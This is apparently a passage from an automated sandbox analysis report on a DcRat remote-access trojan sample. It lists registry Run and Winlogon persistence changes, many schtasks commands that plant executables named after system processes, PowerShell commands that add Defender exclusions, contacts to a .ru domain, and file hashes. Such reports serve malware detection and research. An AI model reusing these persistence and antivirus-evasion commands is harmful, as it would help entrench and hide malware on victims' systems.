| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Recovery\\50341a82-0d88-11ef-8a7e-5aba25856535\\Idle.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Users\\Public\\Music\\Sample Music\\services.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Windows\\Setup\\State\\winlogon.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files (x86)\\MSBuild\\smss.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files (x86)\\MSBuild\\smss.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\System.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400 = "\"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Users\\All Users\\Adobe\\Acrobat\\9.0\\smss.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files\\Internet Explorer\\en-US\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400 = "\"C:\\Users\\Public\\Videos\\Sample Videos\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\MSOCache\\All Users\\sppsvc.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe
"C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\MSBuild\smss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\MSBuild\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e4002" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e4002" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\System.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e4002" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Videos\Sample Videos\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400" /sc ONLOGON /tr "'C:\Users\Public\Videos\Sample Videos\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e4002" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Videos\Sample Videos\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\lsass.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\winlogon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Internet Explorer\en-US\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\en-US\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Internet Explorer\en-US\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Idle.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Music\Sample Music\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Public\Music\Sample Music\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Music\Sample Music\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\sppsvc.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\MSOCache\All Users\sppsvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\sppsvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Adobe\Acrobat\9.0\smss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\All Users\Adobe\Acrobat\9.0\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Adobe\Acrobat\9.0\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Idle.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Windows\AppPatch\AppPatch64\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\AppPatch\AppPatch64\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Windows\AppPatch\AppPatch64\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Windows\TAPI\dwm.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\TAPI\dwm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Windows\TAPI\dwm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Windows\Setup\State\winlogon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\Setup\State\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Windows\Setup\State\winlogon.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\MSBuild\smss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\System.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Videos\Sample Videos\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\lsass.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\winlogon.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\en-US\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Idle.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Music\Sample Music\services.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\sppsvc.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Adobe\Acrobat\9.0\smss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Idle.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\AppPatch\AppPatch64\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\dwm.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Setup\State\winlogon.exe'
C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Idle.exe
"C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Idle.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | a0913612.xsph.ru | udp |
| RU | 141.8.197.42:80 | a0913612.xsph.ru | tcp |
| RU | 141.8.197.42:80 | a0913612.xsph.ru | tcp |
Files
memory/2976-0-0x000007FEF5E43000-0x000007FEF5E44000-memory.dmp
memory/2976-1-0x0000000000AB0000-0x0000000000CAA000-memory.dmp
memory/2976-2-0x000007FEF5E40000-0x000007FEF682C000-memory.dmp
memory/2976-3-0x0000000000440000-0x000000000044E000-memory.dmp
memory/2976-4-0x0000000000450000-0x0000000000458000-memory.dmp
memory/2976-5-0x0000000000460000-0x000000000047C000-memory.dmp
memory/2976-6-0x0000000000680000-0x0000000000690000-memory.dmp
memory/2976-7-0x00000000022C0000-0x00000000022D6000-memory.dmp
memory/2976-8-0x0000000000690000-0x00000000006A0000-memory.dmp
memory/2976-9-0x00000000009D0000-0x00000000009DC000-memory.dmp
memory/2976-10-0x0000000000AA0000-0x0000000000AB2000-memory.dmp
memory/2976-11-0x0000000002300000-0x000000000230C000-memory.dmp
memory/2976-12-0x0000000002310000-0x000000000231C000-memory.dmp
memory/2976-14-0x0000000002330000-0x000000000233C000-memory.dmp
memory/2976-13-0x0000000002320000-0x0000000002328000-memory.dmp
memory/2976-15-0x00000000024A0000-0x00000000024AE000-memory.dmp
memory/2976-16-0x00000000024B0000-0x00000000024B8000-memory.dmp
memory/2976-17-0x000000001A940000-0x000000001A94E000-memory.dmp
memory/2976-18-0x000000001A950000-0x000000001A95C000-memory.dmp
memory/2976-19-0x000000001A9E0000-0x000000001A9EA000-memory.dmp
memory/2976-20-0x000000001A9F0000-0x000000001A9FC000-memory.dmp
memory/2976-21-0x000007FEF5E40000-0x000007FEF682C000-memory.dmp
C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\lsass.exe
| MD5 | 2a0c47d8f5e14cfda0437c59c57fbce9 |
| SHA1 | a1c37d6d20049b2bc1a1db1d99b4f5b7fcd9c2b0 |
| SHA256 | 22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400 |
| SHA512 | 790702639348c58c99dcf4bd35d3b47bd544c7e4cd43fab90b5643f2917e3549e8e92a09d7aea3fed05766c086bdecdadf70c392289c46dc667e69cde73595d5 |
C:\Windows\Setup\State\winlogon.exe
| MD5 | f1a506183dcb001c72b644f5b2c1b9a5 |
| SHA1 | f5d463cadf72764829af7926b43cdffa99275672 |
| SHA256 | 0ae87b9b0dd457ba043a2f86f5321a56b854b2cdb6fd9c2bba8abd9239d8fa55 |
| SHA512 | 2221b8a48fd43353e646055bfb9297c58d2e21ec8c3b4986298645adfc36fd445a9bada6fced95c954a835e3315a00f8bf0c13422c3f890e1703af2126c1df1a |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | de764633ed11d0b919fa4c209be43d98 |
| SHA1 | 7535b1388257533cf61ade286977d69a827c4b46 |
| SHA256 | 82f7d7612520353f1589f43a088a156bbe085bd175897bd7cc8a91b80398a3d4 |
| SHA512 | b521a79a86f3f3259b778231c52e2896f28ed417fab6f713989587bae276a6dfe3cb20b6820d5bbc31509ab69e27f68513313dfabcea6ccd71e896b402d95fa1 |
memory/2704-167-0x000000001B670000-0x000000001B952000-memory.dmp
memory/2576-168-0x0000000002890000-0x0000000002898000-memory.dmp
memory/2028-233-0x0000000000190000-0x000000000038A000-memory.dmp
memory/2976-234-0x000007FEF5E40000-0x000007FEF682C000-memory.dmp
memory/2028-240-0x0000000002190000-0x00000000021A2000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-01 02:49
Reported
2024-06-01 02:51
Platform
win10v2004-20240508-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
DcRat
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\", \"C:\\Program Files (x86)\\Microsoft\\RuntimeBroker.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\", \"C:\\Program Files (x86)\\Microsoft\\RuntimeBroker.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\upfc.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\", \"C:\\Program Files (x86)\\Microsoft\\RuntimeBroker.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\upfc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\es-ES\\StartMenuExperienceHost.exe\", \"C:\\Recovery\\WindowsRE\\Registry.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\services.exe\", \"C:\\Program Files\\Windows NT\\Accessories\\wininit.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\", \"C:\\Program Files (x86)\\Microsoft\\RuntimeBroker.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\upfc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\es-ES\\StartMenuExperienceHost.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\", \"C:\\Program Files (x86)\\Microsoft\\RuntimeBroker.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\upfc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\es-ES\\StartMenuExperienceHost.exe\", \"C:\\Recovery\\WindowsRE\\Registry.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\", \"C:\\Program Files (x86)\\Microsoft\\RuntimeBroker.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\upfc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\es-ES\\StartMenuExperienceHost.exe\", \"C:\\Recovery\\WindowsRE\\Registry.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\services.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\", \"C:\\Program Files (x86)\\Microsoft\\RuntimeBroker.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\upfc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\es-ES\\StartMenuExperienceHost.exe\", \"C:\\Recovery\\WindowsRE\\Registry.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\services.exe\", \"C:\\Program Files\\Windows NT\\Accessories\\wininit.exe\", \"C:\\Windows\\SchCache\\SppExtComObj.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\", \"C:\\Program Files (x86)\\Microsoft\\RuntimeBroker.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\upfc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\es-ES\\StartMenuExperienceHost.exe\", \"C:\\Recovery\\WindowsRE\\Registry.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\services.exe\", \"C:\\Program Files\\Windows NT\\Accessories\\wininit.exe\", \"C:\\Windows\\SchCache\\SppExtComObj.exe\", \"C:\\Program Files\\Windows Portable Devices\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
